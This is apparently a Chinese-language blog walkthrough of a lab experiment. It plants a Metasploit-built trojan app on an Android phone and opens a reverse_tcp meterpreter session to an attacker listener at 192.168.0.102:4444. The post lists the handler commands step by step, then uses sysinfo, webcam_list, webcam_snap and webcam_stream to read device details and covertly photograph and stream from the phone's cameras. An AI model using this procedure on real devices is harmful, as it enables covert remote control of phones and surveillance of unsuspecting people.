1>查看本机IP

记一次msfconsole_android渗透实验_加载

2>生成App木马

记一次msfconsole_android渗透实验_连接超时_02

3>将生成的木马安装至手机

记一次msfconsole_android渗透实验_html_03

4>打开msfconsole

记一次msfconsole_android渗透实验_ip地址_04

 

 1,  use exploit/multi/handler  加载模块、

 2, set payload android/meterpreter/reverse_tcp  选择Payload

 3,show options  查看参数设置

记一次msfconsole_android渗透实验_加载_05

5>更改设置

  1, set LHOST 192.168.0.102   设置为我们生成木马的IP地址

  2, set LPORT 4444 设置为生成木马的监听端口

  3, exploit   执行漏洞 ,开始监听

记一次msfconsole_android渗透实验_加载_06

6>建立连接

当app被点击后,会无任何反应(应该会有一条连接记录的)

但是,我在实验时,并无效果(后来将app卸载时,添加了一条会话)

记一次msfconsole_android渗透实验_html_07

但是,使用sysinfo查看手机信息时:连接超时

于是再次安装App,允许所有权限,装完后点击打开,连接被建立

记一次msfconsole_android渗透实验_加载_08

查看手机信息:sysinfo

记一次msfconsole_android渗透实验_ip地址_09

查看有几个摄像头:webcam_list

 记一次msfconsole_android渗透实验_加载_10

隐秘拍照功能:webcam_snap  // -i 指定那个摄像头

(在试验时应用提示授权,授权后可以实现隐秘拍摄)

记一次msfconsole_android渗透实验_参数设置_11

记一次msfconsole_android渗透实验_参数设置_12

开启摄像头:webcam_stream

 记一次msfconsole_android渗透实验_参数设置_13

会打开一个HTML文件( 略显卡顿)

记一次msfconsole_android渗透实验_参数设置_14

记一次msfconsole_android渗透实验_参数设置_15

  最后再来一张网络上的图:

记一次msfconsole_android渗透实验_连接超时_16

————————————————————————end——————————————————————————